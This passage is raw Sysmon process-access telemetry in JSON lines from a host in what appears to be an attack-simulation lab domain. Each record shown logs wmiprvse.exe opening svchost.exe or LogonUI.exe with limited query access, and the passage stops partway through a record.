{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2C20000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 